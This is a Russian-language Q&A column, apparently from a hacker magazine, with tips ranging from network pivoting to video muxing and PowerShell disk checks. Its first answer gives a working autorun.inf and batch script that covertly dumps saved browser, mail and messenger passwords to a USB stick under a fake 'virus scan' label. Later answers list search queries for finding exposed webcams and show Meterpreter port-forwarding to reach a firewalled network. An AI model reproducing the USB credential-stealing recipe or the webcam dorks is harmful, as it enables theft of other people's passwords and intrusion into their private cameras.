Содержание статьи

 

Q: Мне кажется, все мои пароли увели. Причем кто-то из знакомых, кто имел доступ к компьютеру. Как это могло выйти?

A: Все зависит от фантазии злодея. Для осуществления его коварных замыслов вполне могла быть заготовлена специальная флешка, с помощью которой можно незаметно вытащить очень много полезной инфы. Скажем, многие пользователи, да и автор этой статьи например, позволяет браузеру и другим программам сохранять пароли. Вот их и проще всего увести с помощью нехитрого набора софта:

  • MessenPass (www.nirsoft.net/utils/mspass.html) — восстанавливает пароли к большинству популярных программ для обмена мгновенными сообщениями: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ, Trillian, Miranda и GAIM;
  • Mail PassView (www.nirsoft.net/utils/mailpv.html) — извлекает сохраненные пароли из почтовых клиентов: Outlook Express, Microsoft Outlook 2000, Microsoft Outlook 2002/2003, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird;
  • IE Passview (www.nirsoft.net/utils/internet_ explorer_password.html) — выдергивает логины и пароли, сохраненные Internet Explorer-ом;
  • Protected Storage PassView (www.nirsoft.net/utils/pspv.html) — восстанавливает все пароли, сохраненные в защищенном хранилище;
  • PasswordFox (www.nirsoft.net/utils/passwordfox.html) — получает все пароли, сохраненные Firefox’ом.

Ничего не стоит, заранее сохранив бинарники на флешке, потом запускать их в автозапуске. Создаем autorun.inf со следующим содержанием:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
А затем launch.bat:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext
passwordfox.txt

После этого злоумышленнику остается только подключить флешку и в появившемся popupокне выбрать "ACTION= Perform a Virus Scan", чтобы обзавестись большим количеством паролей, которые сохранятся в текстовых файлах.

 

Q: Как найти веб-камеры, доступ к которым открыт прямо из инета?

A: Вспоминаем статьи по поводу «Googlehack для маленьких!» (www.xakep.ru/magazine/xa/076/056/1.asp) и берем на вооружение несколько полезных запросов:

inurl:"CgiStart?page="
inurl:/view.shtml
intitle:"Live View / — AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
(disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera
NetworkCamera" (disconnected)
intitle:axis intitle:"video
server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.
html"
intitle:"Live NetSnap Cam-Server
feed"
intitle:"Live View / — AXIS"
inurl:indexFrame.shtml Axis
inurl:"MultiCameraFrame?Mode=Motio
n" (disconnected)
intitle:start inurl:cgistart
intitle:"sony network camera
site:.viewnetcam.com -www.
viewnetcam.com
intitle:"Toshiba Network Camera"
user login
intitle:"netcam live image"
(disconnected)
intitle:"i-Catcher Console — Web
Monitor"

 

Q: Как удалить из ОС драйверы неиспользуемых устройств?

A: Подключив даже один раз беспроводную мышку, чужую флешку или любой другой девайс, мы вынуждаем ОС устанавливать для них драйвер, который остается даже в том случае, если сами устройства больше никогда не используются. Таким образом, в системе появляются «устройства-призраки» , что в свою очередь приводит к тому, что ОС начинает долго загружаться. Крайне желательно хотя бы иногда чистить ОС от драйверов таких неиспользуемых устройств, с чем отлично справляется утилита GhostBuster (ghostbuster.codeplex.com). Главное — не удалить лишнего!

 

Q: Столкнулся с такой проблемой. Выполняю пентест корпоративной сети, разделенной файрволом на две части (режет все кроме HTTP/HTTPS-трафика). Уже получил доступ к машине из первой половины сети (172.16.186.132). С этой машины получил доступ через meterpreter-сессию к одной из машин из второй половины сети (172.16.186.126) (та, что за файрволом). Можно ли как-то заставить Nessus просканировать вторую половину сети через meterpreter-сессию?

A: Да, такая проблема довольно часто возникает как в ходе взлома, так и при проведении пентестинга. Схема действий такова (в описании условимся, что машина из первой половины сети — атакующая, из второй — жертва):

1. Сначала необходимо через meterpreterсессию установить OpenSSH на машинужертву. Задача необычная, но весь процесс очень хорошо описан в статье: packetheader.blogspot.com/2009/01/installing-openssh-onwindowsvia.html.

2. После установки OpenSSH и создания учетной записи нужно настроить Meterpreter, чтобы весь входящий трафик на 8000 порт атакующей машины форвардился на 22 порт жертвы:

meterpreter> portfwd add -L
172.16.186.132 -l 8000 -r
172.16.186.128 -p 22

3. Пускаем SSH-соединение через атакующую машину (172.16.186.132):

# ssh -D 127.0.0.1:9000 -p 8000
username@172.16.186.132

Данная команда поднимает SOCKS4-прокси на 9000 порту, который форвардит весь трафик до жертвы через SSH-сессию.

4. Используем PROXYCHAINS для того, чтобы пустить трафик nessusd через SOCKS4-прокси, висящем на 9000 порту (для этого необходимо внести небольшие изменения в файл конфигурации proxychains.conf — в частности поменять порт, указанный в последней строке файла):

# proxychains /usr/sbin/nessusd -D

5. Запускаем Nessus-клиент и можем сканировать сеть.

 

Q: В последнее время стал замечать, что Wireshark при большом потоке пакетов начинает сильно подвисать. Есть ли какой-то способ исправить это?

A: Проблема в том, что Wireshark-у необходимо одновременно перехватывать пакеты, разбирать их на части и обновлять окно с информацией. При анализе большого потока пакетов слабая машина банально не справляется. Выход есть — консольная версия Wireshark Tshark. Тулза поставляется вместе с основной программой и имеет внушительный список опций для запуска (справка выдается по команде tshark -h).

Как это использовать? Для начала работы нужно сперва выбрать сетевой интерфейс для прослушивания. Список доступных интерфейсов запрашивается командой tshark -D. Вывод будет представлять собой нечто подобное:

  1. \Device\NPF_{11A468B6-C06545F6-AB32-D69695A6F601} (MS Tunnel Interface Driver)
  2. \Device\NPF_{A16900A3-020C4B05-B430-4CD67527C189} (Realtek RTL8168B/8111B PCI-E Gigabit Ethernet NIC)

Для перехвата трафика со второго интерфейса достаточно ввести в консоли:

tshark -i 2 -wexample.pcap -f "tcp[13] = 0x14",

где

-i — указывает какой интерфейс прослушивать;
-w — задает, в какой файл сохранять перехваченные пакеты;
-f — определяет фильтр пакетов, использующий синтаксис libpcap (в данном случае, сохраняем tcp пакеты с 13-ым битом в заголовке равным 0x14, то есть пакеты с установленными флагами RST и ACK).

Подробнее про синтаксис можно узнать в мануале www.cs.ucr.edu/~marios/ethereal-tcpdump.pdf и на сайте www.tcpdump.org/tcpdump_man.html. Для того чтобы закончить захват пакетов, достаточно нажать <Ctrl-C>. Полученный файл example.pcap можно загрузить в Wireshark и спокойно, без всяких тормозов, анализировать.

 

Q: Скажи, как можно сравнить две версии одной и той же динамической библиотеки или бинарника, чтобы посмотреть, какие функции изменились и что именно в них изменилось?

A: Для того чтобы сравнить, что изменилось в приложении, можно использовать следующие плагины для IDA:

Схема работы проста: дизассемблируем первую библиотеку, затем вторую. После этого открываем первый диззасемблинг (*.idb файл), заходим в Edit Plugins „Ђ Turbodiff/Bindiff и выбираем опцию «compare with», после чего указываем файл с диззасмеблингом второго файла. В результате программа выдаст подробный отчет о том, какие были произведены изменения в исполняемых файлах.

 

Q: Ковыряю скрипты на наличие XSS/CSRFбагов, не хватает хорошего средства для отслеживания JavaScript-событий. Подскажи, чем лучше пользоваться?

A: Скрипты, отладка, XSS, Javascript — для всего этого хорошо подходит связка Firefox + Firebug + Eventbug. Если о первых двух знают практически все, то Eventbug, который появился совсем недавно, многие по незнанию обходят стороной. Забавно, что это плагин для Firebug’а, который сам по себе уже является плагином (а потому мы удивляемся, что Firefox стал почему-то тормозить :)). А предоставляет он как раз то, что тебе нужно: позволяет просматривать все обработчики событий на странице. После его установки в Firebug появляется дополнительная вкладка «Events». Теперь для того, чтобы посмотреть обработчики какого-либо элемента, достаточно выделить его, и все обработчики сразу отобразятся на панели. Для работы Eventbug требует Firefox 3.6 и Firebug 1.5 или выше. Сам Eventbug находится в стадии активной доработки и пока доступна только бета-версия, которую можно взять здесь — getfirebug.com/releases/eventbug/1.5/eventbug-0.1b4.xpi.

 

Q: Известно, что многие пользователи Linux используют утилиту traceroute для исследования сети. Можно ли ее как-то обмануть?

A: Нет ничего невозможного :). Специально для этого была создана программка Fakeroute (www.thoughtcrime.org/software/fakeroute). Она позволяет задать поддельный маршрут, который будет добавлен к реальному. Скажем, реальный маршрут выглядит так:

traceroute to yyyy (63.199.yy.yyy),
30 hops max, 38 byte packets
1 xx.xxx.com (172.17.8.1) 0.867 ms
0.713 ms 0.601 ms
2 adsl-64.dsl.snfc21.pacbell.net
(64.165.xxx.xxx) 2.065 ms 1.895 ms
1.777 ms
3 yyyy.com (63.199.yy.yyyy) 28.585
ms 26.445 ms 25.489 ms

А теперь чуть поиграем с ним с помощью Fakeroute’а:

traceroute to yyyy (63.199.yy.yyy),
30 hops max, 38 byte packets
1 xx.xxx.com (172.17.8.1) 0.867 ms
0.713 ms 0.601 ms
2 adsl-64.dsl.snfc21.pacbell.net
(64.165.xxx.xxx) 2.065 ms 1.895 ms
1.777 ms
3 wh243.eop.gov (198.137.241.43)
0.442 ms 0.553 ms 0.42 ms
4 foundation.hq.nasa.gov
(198.116.142.34) 0.442 ms 0.542 ms
0.422 ms
5 yyyy.com (63.199.yy.yyyy) 28.585
ms 26.445 ms 25.489 ms

Несложно заметить, что на пути следования магическим образом появилось несколько любопытных узлов :).

 

Q: Каким образом можно зарабатывать деньги на информационной безопасности, кроме как проводить непосредственно пентесты? Естественно, легально.

A: На самом деле, как и в любой другой нише, возможностей здесь миллион. Если не брать в расчет разработку и продажу специализированного софта, выполняющего те или иные проверки, то можно привести в пример несколько успешных веб-сервисов. Взять хотя бы продажу VPN, когда бизнесменам и политикам, требовательным к безопасности, необходимо работать исключительно через защищенное соединение. Увы, те абузоустойчивые VPN, которые продаются хакерам для анонимности, не вполне легальны, потому что владельцы и хостинг намеренно игнорируют жалобы и обращения компетентных органов.

Другой пример — сервис по взлому WPA-ключа с помощью облачных вычислений WPA Cracker (www.wpacracker.com). Ребята подняли кластер из 400 процессоров, нагенерировали огромное количество радужных таблиц (для 135 миллионов паролей), а теперь предоставляют доступ к этому хозяйству за небольшую денежку. В результате, любой желающий за 17$ может попробовать взломать ключ WPA или пароль к ZIP-архиву. На перебор по таблицам уйдет не более 20 минут, в то время как у обычного двухяредрного компьютера на ту же задачу ушло бы 5 дней. Сервис из сегодняшнего WWW2 — SHODAN (www.shodanhq.com), позволяет по заданным параметрам найти серверы (например, работающие на версии Apache). Общая часть функционала бесплатна, но если хочешь экспортировать результаты в удобном XML формате, изволь заплатить денежку. Короче говоря, возможность сделать абсолютно легальный сервис, который напрямую касается ИБ и приносит деньги — более чем реально.

 

Q: Где бы раздобыть свежих образцов малвари для анализа? 🙂

A: Проще всего, зайти на www.malwaredomainlist.com и www.malwareurl.com и скачать свежую базу доменов, откуда производится загрузка троев и другой малвари. Дальше все просто: запускаем виртуальную машину, открываем в старом непатченном браузере один сайт за другим и, анализируя изменения в файловой системе и реестре (утилитами RegMon/FileMon), и удивляемся, насколько легко можно подцепить троя, просто серфя инет.

 

Q: Нужно быстро генерировать NTLM-хеш, как это сделать?

A: Вот тебе пример на Python’е, и это, пожалуй, наиболее простой способ:

import hashlib,binascii
hash = hashlib.new('md4',
"thisismyhashvalue".encode('utf16le')).digest()
print binascii.hexlify(hash)

 

Q: Устроился на подработку админом в одну небольшую компанию (30 компьютеров в локалке, несколько серверов). Пользователи умудряются моментально засорить место на HDD, из-за чего начинает глючить внутренний софт, написанный не самым лучшим программистом. Как бы централизовано проверить наличие свободного места на каждом из компьютеров?

A: Я бы сделал это с помощью PowerShell’а, используя функцию Get-WMIObject Win32_ LogicalDisk. Предположим, список компьютеров хранится у нас в файле c:\hostlist.txt, тогда для вывода информации о свободном месте на каждом из хостов можно получить одной единственной командой:

Get-WMIObject Win32_LogicalDisk
-filter “DriveType=3?
-computer (Get-Content c:\
hostlist.txt) | Select
SystemName,DeviceID,VolumeName,@
{Name=”size(GB)”;Expression={“{0:N1}” -f($_.size/1gb)}},@{Name=”
freespace(GB)”;Expression={“{0:N1}” -f($_.freespace/1gb)}} | OutGridView

Надо заметить, что большая часть кода занимается выводом и фильтрацией результата.

 

Q: Каким образом можно наиболее безболезненно мигрировать с MySQL на SQL Server?

A: С такой ситуацией недавно столкнулся лично, когда начальство попросило осуществить подобный переход. Сложность заключается в том, что в MySQL многие вещи отличаются от SQL Server. Для того чтобы не заморачиваться со многими нюансами вручную, можно автоматизировать процесс — для этого специально создана утилита Microsoft Sql Server Migration Assistant for MySQL (bit.ly/8peZcm).

 

Q: Хочу посмотреть фильм на своем аппаратном HD-проигрывателе. К проигрываемому видеофайлу нельзя подключить внешнюю звуковую дорожку (хочу посмотреть фильм в оригинале), поэтому приходится заранее это делать на компьютере. Пользуются сложным видеоредактром: муторно и сложно. Подскажи какой-нибудь простой способ.

A: Бесплатная программа AVI-Mux GUI (www.alexander-noe.com/video/amg) — то, что доктор прописал. Процесс в этом случае проще простого:

  • выбираешь видео файл;
  • извлекаешь информацию о доступных аудиодорожках (кнопка «generate data source»);
  • далее добавляешь в программу (можно прямо Drag’n’Drop’ом) файлы с другими звуковыми дорожками;
  • нажимаешь Start, чтобы через некоторое время получить готовый файл.

С помощью этой же программы можно склеить и несколько видеофайлов в один.

Оставить мнение

Check Also

Используй, свободно! Как работает уязвимость use-after-free в почтовике Exim

В самом популярном на сегодняшний день почтовом сервере Exim был обнаружен опасный баг: ес…